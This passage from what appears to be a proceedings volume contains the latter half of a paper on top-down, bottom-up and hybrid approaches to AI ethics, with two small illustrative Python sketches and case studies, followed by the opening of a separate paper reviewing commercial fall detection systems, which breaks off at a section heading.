To recombine the perspectives of theoretical, technical, and political bottom-up ethics for AI is a useful analytical thought experiment. Allen et al. [5] describe bottom-up approaches to ethics in AI as those which learn through experience and strive to create environments where appropriate behavior is selected or rewarded, instead of functioning under a specific moral theory. These approaches learn either by unconscious mechanistic trial and failure of evolution, by engineers or programmers adjusting to new challenges they encounter, or by the learning machine’s own educational development [5]. The authors explain the difficulties of evolving and developing strategies that hold the promise of a rise in skills and standards that are integral to the overall design of the system. Trial and error are the fundamental tenets of evolution and learning, which rely heavily on learning from unsuccessful strategies and mistakes. Even in the fast-paced world of computer processing and evolutionary algorithms, this is an extremely time consuming
process. Additionally, we need safe spaces for these mistakes to be made and learned from, where ethics can be developed without real-world consequences.
6.1 Reinforcement Learning as a Methodology for Teaching AI Ethics
Reinforcement learning (RL) is a technique of machine learning where an agent learns by trial and error in an interactive environment, utilizing feedback from its own actions and experiences [8]. Reinforcement learning is different from other forms of learning that rely on top-down rules. Rather, this system learns as it goes, making many mistakes but learning from them, and it adapts through sensing the environment. RL is commonly used in training algorithms to play games, such as Go (AlphaGo) and chess. When it originated, RL was studied in animals, as well as early computers. The trial and error beginnings of this technique have origins in the psychology of animal learning in the early 1900s (Pavlov), as well as in some of the earliest work in AI. This coalesced in the 1980s to develop into the modern field of reinforcement learning [27]. RL utilizes a goal-oriented approach, as opposed to having explicit rules of operation. A ‘rule’ in RL can come about as a temporary side-effect as it attempts to solve the problem; however, if the rule proves ineffective later on, it can be discarded. The function of RL is to compensate for machine learning drawbacks by mimicking a living organism as much as possible [29]. This style of learning that throws the rule book out the window could be promising for something like ethics, where the rules are not overly consistent or even agreed upon. Ethics is more situation-dependent, therefore teaching a broad rule is not always sufficient. It is worth investigating whether RL could serve as a method for integrating ethics into AI. The problems addressed by RL consist of learning what to do, that is, how to map situations to actions, in order to maximize a numerical reward signal.
The three most important distinguishing features of RL are: First, that it is essentially a closed-loop; second, that it is not given direct instructions on what actions to take; and third, that there are consequences (reward signals) playing out over extended periods of time [27]. Turning ethics into numerical rewards can pose many challenges, but may be a hopeful consideration for programming ethics into AI systems. Critically, the agent must be able to sense its environment to some degree and it must be able to take actions that affect the state [27]. One of the ways that RL can work in an ethical sense, and to avoid pitfalls, is by utilizing systems that keep a human in the loop. “Interactive learning constitutes a complementary approach that aims at overcoming these limitations by involving a human teacher in the learning process” [20]. Keeping a human in the loop is critical for many issues, including those around transparency. Moral uncertainty needs to be considered, purely because ethics is an area of vast uncertainty, and is not an answerable math problem with predictable results [12]. Could an RL program eventually learn how to compute all the different ethical possibilities? This may take a lot of experimentation. It is important to know the limitations, while also remaining open to being surprised. We worry a lot about the unknowns of AI: Will it truly align with our values? Only through experimentation can we find out. Researchers stress the importance of RL systems needing a ‘safe learning environment’ where they can learn without any harm being caused to humans, assets, or the external environment.
The gap between simulated and actual environments, however, complicates this issue, particularly related to differentiating societal and human values [10].
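The trial-and-error loop described in this section can be sketched with tabular Q-learning, one standard RL algorithm that we choose here for illustration; the cited works do not prescribe it. The environment is a hypothetical five-cell corridor acting as a ‘safe learning environment’: the agent starts in the middle, is penalized for reaching the leftmost cell (standing in for a harmful outcome), and is rewarded for reaching the rightmost cell. The reward values, learning rate, discount factor, and exploration rate are all assumptions.

```python
import random
from typing import Dict, Tuple

ACTIONS = ["left", "right"]
HARM_STATE, GOAL_STATE, START_STATE = 0, 4, 2


def step(state: int, action: str) -> Tuple[int, float, bool]:
    """Deterministic corridor: returns (next_state, reward, episode_done)."""
    next_state = state - 1 if action == "left" else state + 1
    if next_state == HARM_STATE:
        return next_state, -1.0, True  # numerical stand-in for a harmful outcome
    if next_state == GOAL_STATE:
        return next_state, 1.0, True  # numerical stand-in for a good outcome
    return next_state, 0.0, False


def train(
    episodes: int = 500,
    alpha: float = 0.5,
    gamma: float = 0.9,
    epsilon: float = 0.2,
    seed: int = 0,
) -> Dict[Tuple[int, str], float]:
    """Learn action values by trial and error; no rule says which way to go."""
    rng = random.Random(seed)
    q = {(s, a): 0.0 for s in range(5) for a in ACTIONS}
    for _ in range(episodes):
        state = START_STATE
        for _ in range(200):  # cap on episode length
            if rng.random() < epsilon:
                action = rng.choice(ACTIONS)  # explore
            else:
                action = max(ACTIONS, key=lambda a: q[(state, a)])  # exploit
            next_state, reward, done = step(state, action)
            best_next = 0.0 if done else max(q[(next_state, a)] for a in ACTIONS)
            # Q-learning update: move the estimate toward reward + discounted future value.
            q[(state, action)] += alpha * (
                reward + gamma * best_next - q[(state, action)]
            )
            state = next_state
            if done:
                break
    return q


def greedy_policy(q: Dict[Tuple[int, str], float]) -> Dict[int, str]:
    """Best learned action in each non-terminal state."""
    return {s: max(ACTIONS, key=lambda a: q[(s, a)]) for s in (1, 2, 3)}


q_table = train()
print(greedy_policy(q_table))
```

The agent is never told that the left end is bad. It discovers this through penalized mistakes made inside the simulation. The sketch also shows the limitation noted above: everything the agent learns about “harm” is whatever the designer encoded as a number, which is where the gap between simulated and actual values enters.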
7 The Top-Down Method of AI Being Taught Ethics
Summarizing top-down ethics for AI brings together the philosophical principles, programming rules, and authoritative control in this area. A common thread among all sets of top-down principles is ensuring AI is used for “social good” or “the benefit of humanity”. These phrases carry with them few if any real commitments; hence, a great majority of people can agree on them. However, many of these proposed principles for AI ethics are simply too broad to be action guiding [32]. Furthermore, if these principles are being administered from Big Tech or the government in a top-down political manner, there could be a lot that slips under the radar because it sounds good. Relating to the earlier example in Sect. 3.1, ‘fairness’ is something we can all agree is good, but we can’t all agree what it means. Fair for one person or group could equate to deeply unfair for another. According to Wallach et al. [31] the price of top-down theories can amount to static definitions which fail to accommodate new conditions, or may potentially be hostile. The authors note that the meaning and application of principle goals can be subject to debate due to them being overly vague and abstract [31]. This is a problem that will need to be addressed going forward. A machine doesn’t implicitly know what ‘fairness’ means. So how can we teach it a singular definition when fairness holds a different context for everyone? Next, we turn to the area of principles of AI ethics to explore the top-down method further.
7.1 Practical Principles for AI Ethics
Principles of AI are a top-down approach to ethics for artificial intelligence. In the last few years, we have been seeing lists of principles for AI ethics emerging prolifically. These lists are very useful, not only for AI and its impact, but also on a larger social level. Because of AI, people are thinking about ethics in a whole new way: How do we define and digest ethics in order to codify it?
Principles can be broken into two categories: principles for people who program AI systems to follow, and principles for the AI itself. Some of the principles for people, mainly programmers and data scientists, read like commandments. For instance, The Institute for Ethical AI and ML [28] has a list of eight principles geared toward technologists that can be viewed in Table 3. Other lists of principles are geared towards the ethics of AI systems themselves and what they should adhere to. One such list, published by the National Institute of Standards and Technology (NIST) [22], consists of four principles intended to promote explainability. These can be viewed in Table 4. Many of the principles overlap across corporations and agencies. A detailed graphic and writeup published by the Berkman Klein Center for Internet and Society at Harvard
gives a detailed overview of forty-seven principles that various organizations, corporations, and other entities are adopting, including where they overlap and their definitions. The authors provide many lists and descriptions of ethical principles for AI, and categorize them into eight thematic trends, listed below.
Table 3. Principles and their commitments for technologists to develop machine learning systems responsibly, as described in the practical framework to develop AI responsibly by the Institute for Ethical AI & Machine Learning [28]
Principle | Commitment of technologists
Human augmentation | To keep a human in the loop
Bias evaluation | To continually monitor bias
Explainability and justification | To improve transparency
Reproducibility | To ensure infrastructure that is reasonably reproducible
Displacement strategy | To mitigate impact on workers due to automation
Practical accuracy | To align with domain-specific applications
Trust by privacy | To protect and handle data
Data risk awareness | To consider data and model security
Table 4. Principles and their commitments for responsible machine learning and AI systems [22]
Principle | Commitment of AI system
Explanation | Provide evidence and reasons for its processes and outputs
Meaningful and understandable | Have methods to evaluate meaningfulness
Explanation accuracy | Correctly reflect the reason(s) for its generated output
Knowledge limits | Ensure that a system only operates under conditions for which it was designed and that it does not give overly confident answers in areas it has limited knowledge of. Ex: a system programmed to classify birds being used to classify an apple
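The ‘knowledge limits’ commitment in Table 4 can be illustrated with a classifier that declines to answer when it is not confident. This is a simplified sketch under our own assumptions, not a method specified by NIST [22]: the bird labels, the raw scores, and the 0.8 threshold are hypothetical, and softmax confidence is only a crude proxy for whether an input lies outside what a system was designed for.

```python
import math
from typing import List

BIRD_LABELS = ["sparrow", "robin", "finch"]  # hypothetical classes


def softmax(scores: List[float]) -> List[float]:
    """Convert raw scores into probabilities that sum to one."""
    peak = max(scores)
    exps = [math.exp(s - peak) for s in scores]  # subtract peak for stability
    total = sum(exps)
    return [e / total for e in exps]


def classify_with_limits(scores: List[float], threshold: float = 0.8) -> str:
    """Return a bird label only when the top probability clears the threshold."""
    probs = softmax(scores)
    best = max(range(len(probs)), key=probs.__getitem__)
    if probs[best] < threshold:
        return "unknown"  # abstain instead of giving an overconfident answer
    return BIRD_LABELS[best]


# Hypothetical raw scores: a clear sparrow photo vs. a photo of an apple.
print(classify_with_limits([4.0, 0.5, 0.2]))
print(classify_with_limits([1.0, 1.1, 0.9]))
```

For the first input one class dominates, so a label is returned. For the second the scores are nearly flat, so the system abstains. In practice a model can also be confidently wrong on unfamiliar inputs, so a threshold like this is a starting point for honoring knowledge limits rather than a guarantee.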
1. Privacy
2. Accountability
3. Safety and security
4. Transparency and explainability
5. Fairness and non-discrimination
6. Human control of technology
7. Professional responsibility
8. Promotion of human values [16]
One particular principle that is missing from these lists regards taking care of the natural world and non-human life. As Boddington states in her book, Toward a Code of Ethics for Artificial Intelligence (2018), “… we are changing the world, AI will hasten these changes, and hence, we’d better have an idea of what changes count as good and what count as bad” [9]. We will all have different opinions on this, but it needs to be part of the discussion. We can’t continue to destroy the planet while trying to create super AI, and still be under the illusion that our ethics principles are saving the world. Many of these principles are theoretically sound, yet act as a veil that presents the illusion of ethics. This can be dangerous because it makes us feel like we are practicing ethics while business carries on as usual. Part of the reason for this is because the field of ethical AI development is so new and more research must be done yet to ensure the overall impact is a benefit to society. “Despite the proliferation of these ‘AI principles,’ there has been little scholarly focus on understanding these efforts either individually or as contextualized within an expanding universe of principles with discernible trends” [16]. Principles are a double sided coin. On one hand, making the stated effort to follow a set of ethical principles is good. It is beneficial for people to be thinking about doing what is right and ethical, and not just blindly entering code that could be detrimental in unforeseen ways. Some principles are simple in appearance yet incredibly challenging in practice. For example, if we look at the commonly adopted principle of transparency, there is quite a difference between saying that algorithms and machine learning should be explainable and actually developing ways to see inside of the black box. As datasets get bigger, this presents more and more technical challenges [9]. 
Furthermore, some of the principles can conflict with each other, which can land us in a less ethical place than where we started. For example, transparency can conflict with privacy, another popular principle. We can run into a lot of complex problems around this, which need to be addressed quickly and thoroughly as we move into the future. Overall, we want concepts such as Fairness, Accountability, and Transparency in people’s minds. These are the core tenets and namesake of the FAccT conference [2] that addresses these principles in depth. It is incredibly important for corporations and programmers to be concerned about the commonly addressed themes of bias, discrimination, oppression, and systemic violence. Yet these principles can make us feel like we are doing the right thing, which raises the question: how much does writing out these ideals actually change things? In order for AI to be ethical, a great deal has to change, and not just in the tech world. There seems to be an omission of the unspoken principles: the value of money for corporations and those in power, and convenience for those who can afford it. If we are aiming to create fairness, accountability, and transparency in AI, we need to do some serious work on society to adjust our core principles away from money and convenience and towards taking care of everyone’s basic needs and the Earth. Could AI be a tool that has a side effect of starting an ethics revolution? How do we accomplish this? The language that we use is important, especially when it comes to principles. Moss and Metcalf pointed out the importance of using market-friendly terms. If we want morality to win out, we need to justify the organizational resources necessary, when more often than not, companies will choose profit over social good [19].
Whittlestone et al. describe the need to focus on areas of tension in ethics in AI, and point out the ambiguity of terms like ‘fairness’, ‘justice’, and ‘autonomy’. The authors prompt us to question how these terms might be interpreted differently across various groups and contexts [32]. They go on to say that principles need to be formalized into standards, codes and ultimately regulation in order to be useful in practice. Attention is drawn to the importance of acknowledging tensions between high-level goals of ethics, which can differ and even contradict each other. In order to be effective, it is vital to include a measure of guidance on how to resolve different scenarios. In order to reflect genuine agreement, there must be acknowledgement and accommodation of different perspectives and values as much as possible [32]. The authors then introduce four reasons that discussing tensions is beneficial and important for AI ethics:
1. Bridging the gap between principles and practice.
2. Acknowledging differences in values.
3. Highlighting areas where new solutions are needed.
4. Identifying ambiguities and knowledge gaps [32].
Each of these needs to be considered ongoing, as these tensions don’t get solved overnight. Particularly, creating a bridge between principles and practice is important. “We need to balance the demand to make our moral reasoning as robust as possible, with safeguarding against making it too rigid and throwing the moral baby out with the bathwater by rejecting anything we can’t immediately explain. This point is highly relevant both to drawing up codes of ethics, and to the attempts to implement ethical reasoning in machines” [9]. Codes of ethics and ethical principles for AI are important and help start important conversations. However, it can’t stop there. The future will see more and more ways that these principles are put into action, and bring technologists and theorists together to investigate ways to make them function efficiently and ethically. We must open minds to ideas beyond making money for corporations and creating conveniences, and rather toward addressing tensions and truly creating a world that works for everyone.
8 The Hybrid of Bottom-Up and Top-Down Ethics for AI
We have reviewed the benefits and flaws of a top-down approach to ethics in AI, and visited the upsides and pitfalls of the bottom-up approach as well. Many argue that the solution lies somewhere in between, in a hybrid model. “If no single approach meets the criteria for designating an artificial entity as a moral agent, then some hybrid will be necessary. Hybrid approaches pose the additional problems of meshing both diverse philosophies and dissimilar architectures” [5]. Many agree that a hybrid of top-down and bottom-up would be the most effective model for ethical AI. Further, some argue that we need to question the ethics of people, both as the producers and consumers of technology, before we can start to assess fairness in AI. Researchers state that hybrid AI combines the most desirable aspects of bottom-up approaches, such as neural networks, and top-down approaches, also referred to as symbolic AI [25]. When huge
data sets are combined, neural networks are allowed to extract patterns. Then, information can be manipulated and retrieved by rule-based systems utilizing algorithms to manipulate symbols [25]. Further research has observed the complementary strengths and weaknesses of bottom-up and top-down strategies. Raza et al. developed a hybrid program synthesis approach, improving top-down inference by utilizing bottom-up analysis [24]. When we apply this to ethics and values, ethical concerns that arise from outside of the entity are emphasized by top-down approaches, while the cultivation of implicit values arising from within the entity is addressed by bottom-up approaches [31]. While the authors stated that hybrid systems lacking effective or advanced cognitive faculties will be functional across many domains, they noted how essential it is to recognize times when additional capabilities will be required [31]. Theoretically, a hybrid ethic for AI which features the best of top-down and bottom-up methods in combination is incredibly promising, but in reality, many of the semi-functional or non-functional applications of supposed ethical AI prove challenging and have unforeseen side effects. Many real-world examples could be seen as a hybrid of ethics in AI, and not all have beaming qualities of top-down and bottom-up ethics; rather, they represent the messiness and variance of life. Next we will explore a selection of case studies, which will reflect some ethical AI concerns in real-world examples from across the globe.
8.1 Data Mining Case Study: The African Indigenous Context
Data sharing, or data mining, is a prime example of conflicting principles of AI ethics. On one hand, it is the epitome of transparency and a crucial element to scientific and economic growth.
On the other hand, it brings up serious concerns about privacy, intellectual property rights, organizational and structural challenges, cultural and social contexts, unjust historical pasts, and potential harms to marginalized communities [4]. We can reflect on this as a hybrid of top-down and bottom-up ethics in AI, since it utilizes top-down politics, bottom-up data collection, and is theoretically a conflict between the principles of the researchers and the researched communities. The term data colonialism can be used to describe some of the challenges of data sharing, or data mining, which reflect historical and present-day colonial practices such as those in African and Indigenous contexts. When we use terms such as ‘mining’ to discuss how data is collected from people, the question remains, who benefits from the data collection? The use of data can paradoxically be harmful to the communities it is collected from. Trust is challenging due to the historical actions taken by data collectors while mining data from Indigenous populations. What barriers exist that prevent collected data from being of benefit to African people? We must address the entrenched legacies of power disparities and the challenges they present for modern data sharing [4]. One problematic example is of a non-governmental organization (NGO) that tried to ‘fix’ problems for marginalized ethnic groups and ended up causing more harm than good. In this case, a European-based NGO planned to address the problem of access to clean potable water in Buranda, while simultaneously testing new water accessibility technology and online monitoring of resources [4]. The NGO failed to understand the perspective of the community on the true central issues and potential harms. Sharing the data publicly, including geographic locations, put the community at risk, as collective
privacy was violated. In the West, privacy is often thought of as a personal concern; however, collective identity is of great importance to many African and Indigenous communities. This introduced trust issues due to the disempowerment of local communities in the decision-making process. Another case study in Zambia observed that up to 90% of health research funding comes from external funders, meaning that Zambian scholars have little bargaining power in negotiations. In the study, power imbalances were reported in everything from funding to agenda setting, data collection, analysis, interpretation, and reporting of results [4]. This example further shows that trust cannot be formed on the foundation of these imbalances of power. Due to this lack of trust, many researchers have run into hurdles with collecting data from marginalized communities. Many of these research projects lead with good intentions, yet there was a lack of forethought into the ethical use of data, during and after the project, which can create unforeseen and irreparable harms to the wellbeing of communities. This creates a hostile environment in which to build relationships of respect and trust [4]. To conclude this case study in data mining, we can pose the ethical question, “is data sharing good/beneficial?” First and foremost, local communities must be the primary beneficiaries of responsible data sharing practices [4]. It is important to specify who benefits from data sharing, and to make sure that it is not doing any harm to the people behind the data.
8.2 Contact Tracing for COVID-19 Case Study
Another complex example of ethics in AI can be seen in the use of contact tracing during the COVID-19 pandemic. Contact tracing can be centralized or non-centralized, which directly relates to top-down and bottom-up methods.
The centralized approach is what was deployed in South Korea, where by law, and for the purposes of infectious disease control, the national authority is permitted to collect and use information on all COVID-19 patients and their contacts [15]. In 2020, Germany and Israel tried and failed at adopting centralized approaches, due to a lack of exceptions for public health emergencies in their privacy laws [15]. Getting past the legal barriers can be a lengthy and complex process and is not conducive to applying a centralized contact tracing system during the outbreak [15]. Non-centralized approaches to contact tracing are essentially smartphone apps which track proximal coincidence with less invasive data collection methods. These approaches have thus been adopted by many countries, and don’t have the same cultural and political obstacles as centralized approaches, avoiding legal pitfalls and legislative reform [15]. Justin Fendos, a professor of cell biology at Dongseo University in Busan, South Korea, wrote that in supporting the public health response to COVID-19, Korea had the political willingness to use technological tools to their full potential [14]. The Korean government had collected massive amounts of transaction data to investigate tax fraud even before the COVID-19 outbreak. Korea’s government databases hold records of literally every credit card and bank transaction, and this information was repurposed during the outbreak to retroactively track individuals. In Korea, 95% of adults own a
smartphone and many use cashless tools everywhere they go, including on buses and subways [14]. Hence, contact tracing in Korea was extremely effective. Public opinion about surveillance in Korea has been stated to be overwhelmingly positive. Fatalities in Korea due to COVID-19 were a third of the global average as of April 2020, when it was also said that Korea was one of the few countries to have successfully flattened the curve. Despite the success, there have been concerns regarding the level of personal details released by health authorities, which have motivated updated surveillance guidelines for sensitive information [14]. Turning to the other side of the planet, a very different picture can be painted. One study focused on three heavily impacted cities in Brazil which had the most deaths from COVID-19 until the first half of 2021. The researchers provided a methodology for applying data mining as a public health management tool, including identifying variables of climate and air quality in relation to the number of COVID-19 cases and deaths. They used rules-based forecasting models to forecast new COVID-19 cases and daily deaths in the three Brazilian cities studied (São Paulo, Rio de Janeiro and Manaus) [7]. However, the researchers noted that counting of cases in Brazil was affected by high underreporting due to low testing, as well as technical and political problems; hence the study stated that cases may have been up to 12 times greater than investigations indicated [7]. This shows us that the same technology cannot necessarily be scaled to work for all people in all places across the globe, and that individual care must be taken when looking for the best solutions for everyone.
9 Discussion
In the primary paper that this research builds on, titled Artificial Morality: Top-down, Bottom-up, and Hybrid Approaches, the authors lead by stating: “Artificial morality shifts some of the burden for ethical behavior away from designers and users, and onto the computer systems themselves” [5]. This is a questionable claim. Machines cannot be held responsible for what they learn from people, ever. Machines do not have an inherent conscience or morality as humans do. Moreover, AI can act as a mirror, and the problems that arise in AI often reflect the problems we have in society. People need to assume responsibility, both as individuals and as a society at large. Corporations and governments need to cooperate, and individual programmers and technologists should continually question and evaluate these systems and their morality. In this way, we can use AI technology in an effort to improve society, and create a more sustainable world for everyone. The approach of moral uncertainty is intriguing because there isn’t ever one answer or solution to an ethical question, and to admit uncertainty leaves it open to continued questioning that can lead us to the answers that may be complex and decentralized. This path could possibly create a system that can adapt to meet the ethical considerations of everyone involved [31]. Ultimately, societal ethics need to be considered, as AI does not exist in a vacuum. A large consideration is technology in service of making money, primarily for big corporations, and not for improving lives and the world. As long as this is the backbone driving AI and other new technology, we cannot reach true ethics
in this field. Given our tendency for individualism over collectivism, who gets to decide what codes of ethics AI follows? If it is influenced by Big Tech, which is often the case, it will serve to support the ethics of a company, which generally has the primary goal of making money for that company. The value of profit over all else needs to shift. “Big Tech has transformed ethics into a form of capital—a transactional object external to the organization, one of the many ‘things’ contemporary capitalists must tame and procure… By engaging in an economy of virtue, it was not the corporation that became more ethical, but rather ethics that became corporatised. That is, ethics was reduced to a form of capital—another industrial input to maintain a system of production, which tolerated change insofar as it aligned with existing structures of profit-making” [21]. This reflects the case study of data mining in African communities, whose researchers set out to do good, however were still working in old frameworks around mining resources for personal gain, regurgitating colonialism. Until we can break free from these harmful systems, building an ethical AI is either going to continue to get co-opted and recapitalized, or possibly, it will find a way to create brand new systems where it can truly be ethical, creating a world where other worlds are possible. To leave us with a final thought: “Ethical issues are never solved, they are navigated and negotiated as part of the work of ethics owners.” [19].
10 Conclusion
We have explored ethics in AI implementation in three ways: theoretically, technically, and politically as described through top-down, bottom-up, and hybrid frameworks. Within this paper, we reviewed reinforcement learning as a bottom-up example, and principles of AI ethics as a top-down example. The concept of fairness as a key ethical value for AI was discussed throughout. Case studies were reviewed to exemplify just how complex and variant ethics in AI can be in different cultures and at different times. The conclusion is that ethics in AI needs a lot more research and work, and needs to be considered from multiple angles while being continuously monitored for unforeseen side effects and consequences. Furthermore, societal ethics need to be accounted for. Our hope is that at least for those who are intending to build and deploy ethical AI systems, they will consider all angles and blind spots, including who might be marginalized or harmed by the technology, especially when it aims to help. By continuing to work on the seemingly impossible task of creating ethical AI, this will radiate out to society and ethics will become more and more of a power in itself that can have wider implications for the betterment of all.
References
1. Experimentalism and the Fourth Industrial Revolution #OPEN Roundtable Summary Note: Experimentalism - Le Guin Part 2. Google Docs
2. ACM FAccT Conference, 1 (2022)
3. AI Principles - Future of Life Institute, 1 (2022)
4. Abebe, R., et al.: Narratives and counternarratives on data sharing in Africa. In: FAccT 2021 - Proceedings of the 2021 ACM Conference on Fairness, Accountability, and Transparency (2021)
5. Allen, C., Smit, I., Wallach, W.: Artificial morality: top-down, bottom-up, and hybrid approaches. Ethics Inf. Technol. 7(3), 149–155, 9 (2005)
6. Awad, E., et al.: The moral machine experiment. Nature 563(7729), 59–64 (2018)
7. da Silveira Barcellos, D., Fernandes, G.M.K., de Souza, F.D.: Data based model for predicting COVID-19 morbidity and mortality in metropolis. Scient. Reports 11(1), 24491 (2021)
8. Bhatt, S.: Reinforcement learning 101, 3 (2018)
9. Boddington, P.: Towards a Code of Ethics for Artificial Intelligence. Springer International Publishing, Cham (2017)
10. Bragg, J., Habli, I.: What Is Acceptably Safe for Reinforcement Learning? pp. 418–430 (2018)
11. Eckart, P.: Top-down AI: The Simpler, Data-Efficient AI (2020)
12. Ecoffet, A., Lehman, J.: Reinforcement Learning Under Moral Uncertainty, 6 (2020)
13. Etzioni, A., Etzioni, O.: Incorporating ethics into artificial intelligence. J. Ethics 21(4), 403–418 (2017). https://doi.org/10.1007/s10892-017-9252-2
14. Fendos, J.: How surveillance technology powered South Korea’s COVID-19 response. Brookings Tech Stream, 4 (2020)
15. Fendos, J.: PART I: COVID-19 contact tracing: why South Korea’s success is hard to replicate. Georgetown J. Int. Affairs, 10 (2020)
16. Fjeld, J., Achten, N., Hilligoss, H., Nagy, A., Srikumar, M.: Principled artificial intelligence: mapping consensus in ethical and rights-based approaches to principles for AI. SSRN Electronic J. (2020)
17. Martin, K.: Ethical implications and accountability of algorithms. J. Bus. Ethics 160(4), 835–850 (2018). https://doi.org/10.1007/s10551-018-3921-3
18. Merriam-Webster. Merriam-Webster (2022)
19. Moss, E., Metcalf, J.: The ethical dilemma at the heart of Big Tech Companies, 11 (2019)
20. Najar, A., Chetouani, M.: Reinforcement learning with human advice: a survey. Frontiers in Robotics and AI 8, 6 (2021)
21. Phan, T., Goldenfein, J., Mann, M., Kuch, D.: Economies of virtue: the circulation of ‘Ethics’ in big tech. Sci. Culture, 1–15, 11 (2021)
22. Jonathon Phillips, P.: Four Principles of Explainable Artificial Intelligence. Technical report, National Institute of Standards and Technology, Gaithersburg, MD, 9 (2021)
23. Rainie, L., Anderson, J., Vogels, E.: Experts doubt ethical AI design will be broadly adopted as the norm within the next decade. Pew Research Center: Internet, Science & Tech, 6 (2021)
24. Raza, M., Gulwani, S.: Web data extraction using hybrid program synthesis: a combination of top-down and bottom-up inference. In: Proceedings of the 2020 ACM SIGMOD International Conference on Management of Data, pp. 1967–1978. ACM, New York, 6 (2020)
25. Sagar, R.: What is Hybrid AI? Analytics India Magazine, 7 (2021)
26. Shmueli, B., Fell, J., Ray, S., Ku, L.-W.: Beyond fair pay: ethical implications of NLP crowdsourcing. In: Proceedings of the 2021 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Stroudsburg, PA, USA, pp. 3758–3769. Association for Computational Linguistics (2021)
27. Sutton, R., Barto, A.: Reinforcement Learning, 2 edn. MIT Press (2018)
28. The Institute for Ethical AI & Machine Learning. The 8 principles for responsible development of AI & Machine Learning systems, 12 (2021)
29. Vachnadze, G.: Reinforcement learning: Bottom-up programming for ethical machines, 2 (2021)
30. van Rysewyk, S.P., Pontier, M.: A Hybrid Bottom-Up and Top-Down Approach to Machine Medical Ethics: Theory and Data, pp. 93–110 (2015)
31. Wallach, W., Allen, C., Smit, I.: Machine morality: bottom-up and top-down approaches for modelling human moral faculties. AI Soc. 22(4), 565–582 (2008)
32. Whittlestone, J., Nyrup, R., Alexandrova, A., Cave, S.: The role and limits of principles in AI ethics. In: Proceedings of the 2019 AAAI/ACM Conference on AI, Ethics, and Society, pp. 195–200. ACM, New York (2019)
An Analysis of Current Fall Detection Systems and the Role of Smart Devices and Machine Learning in Future Systems
Edward R. Sykes
Sheridan College, Centre for Mobile Innovation, Oakville, Ontario, Canada
[email protected]
https://www.sheridancollege.ca/research/centres/mobile-innovation
Abstract. Fall detection and prevention is a critical area of research, especially as senior populations grow around the globe. This paper explores current fall detection systems, and proposes the integration of smart technology into existing fall detection systems via smartphones or smartwatches to provide a broad spectrum of opportunities for data collection and analysis. We created and evaluated three ML classifiers for fall detection, namely, k-NN, SVM, and DNN, using an open-source fall dataset. The DNN performed the best with an accuracy of 92.591%. Recommendations are also included that illustrate the limitations of current systems, and suggest how new systems could be designed to improve the accuracy of detecting and preventing falls.
Keywords: Fall detection · Fall prevention · mobile health (mHealth) · Seniors · Machine learning · Deep learning
1 Introduction
Of Canada’s nearly forty million citizens, approximately ten million people are aged forty-five to sixty-four [16]. Roughly a quarter of our citizens must consider the dangers of a simple slip and fall [16]. Often, when a senior falls, they can find themselves in hospital for a fractured hip, or a dislocated shoulder, or even head trauma [6,16]. Between 2008 and 2009, 73,190 people were admitted to hospital because of a fall [10]. Figure 1 presents the Canadian population in millions, by gender and age group (2021) [16]. Consistent with populations in other countries, the 65 and over group is amongst the fastest growing cohorts [16]. Fall detection and prevention systems have been in place for several years, but they have limitations and need improvement to curtail this high number of falls [14,21]. A review of current systems is needed to explore the limitations and opportunities for enhancement of fall detection and fall prevention systems.
Fig. 1. Canadian population in millions, by gender and age group (2021) [16]
The main contributions of this work are:
1. a critical review of current fall detection and prevention systems that are commercially available,
2. a comparison of three commonly used Machine Learning algorithms for fall detection,
3. recommendations for new fall detection and prediction systems.
This paper is structured as follows: Sect. 2 provides a literature review of current fall detection and prevention systems commercially available on the market, and of the sensors and algorithms used in such systems; Sect. 3 presents the methodology by which we designed our experiment, including the machine learning algorithms; Sect. 4 presents the results; Sect. 5 provides a discussion; and Sect. 6 provides a conclusion.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 502–520, 2023. https://doi.org/10.1007/978-3-031-28073-3_36
2 Literature Review
2.1 Current Fall Detection and Fall Prevention Systems
This section presents a review of the current fall detection and fall prevention systems commercially available on the market. Galaxy Medical Alert. Galaxy Medical Alert Systems offers a variety of fall detection and emergency response systems [3]. Each system can be customized based on the needs of the individual. These systems include a base with a battery
backup in case of power failure, 24/7 monitoring by a CSAA 5 Diamond Response Centre, two-way communication, and one-button activation [3]. However, each system has different features based on extra needs that may arise from the individual’s circumstances. The basic Home System has a limited number of features. The Home and Yard System includes all the features of the Home System, adds a battery backup in the pendant, and has a wider range of detection for seniors who are frequently outside in the nearby vicinity [3]. Figure 2 presents the Galaxy Medical Alert system for fall detection. Galaxy Medical Alert also has a Fall Detection System, which automatically detects a fall and sends for help, even if the person is unable to reach their button [3]. The Cellular System is the same as the Home System but does not use a landline like the other systems; instead, it uses 3G and 4G cellular technology. Finally, there is a mobile-based version of their Fall Detection System. This system is intended for smartphone users and provides standard features, such as GPS location service and Bluetooth pairing, and uses cellular communication technologies (LTE, 5G, etc.) [2].
Fig. 2. Galaxy medical alert system [2]
SecurMEDIC. SecurMEDIC is a system that uses either a pendant or a watch and a central base station [4]. These devices, apart from the station, are all 100% waterproof [4]. Figure 3 presents the SecurMEDIC system components. The system is compatible with mobile phones to answer incoming calls when help is requested. The device has an emergency button, and also has a microphone to talk into the device. Upon pressing the emergency button, the system calls the toll-free number to the call center. The system can also be used for emergencies that are
not fall related, for example burglaries or fires. The devices have a wireless range of 1,000 ft (approximately 300 m) from the central unit. The SecurMEDIC device has a low battery indicator light that shows when it is time to replace or charge the battery for continuous monitoring [4]. The pendant device comes with or without a fall detection system, and the watch only comes with the fall detection system [4].
Fig. 3. SecurMEDIC fall detection system with wrist sensor [4]
TELUS Health. TELUS Health has a few different fall detection systems, and the most popular one is the LivingWell Companion. Their basic version includes a pendant with an emergency button. This pendant includes a built-in microphone and speaker for communication, and connects instantly to emergency services, as well as to family or friends, when the button is pressed. TELUS Health also offers a fall detection system, which includes all the features of the basic Companion, and additionally includes constant professional monitoring, fall detection, a built-in loudspeaker, and is waterproof. Figure 4 presents the TELUS Health fall detection system and related components. TELUS Health also offers an On the Go Companion, which is meant for city travelling or monitoring around the neighborhood. To achieve this, the device has a built-in GPS, constant monitoring, two-way communication, and auto-detection [17].
2.2 Sensors
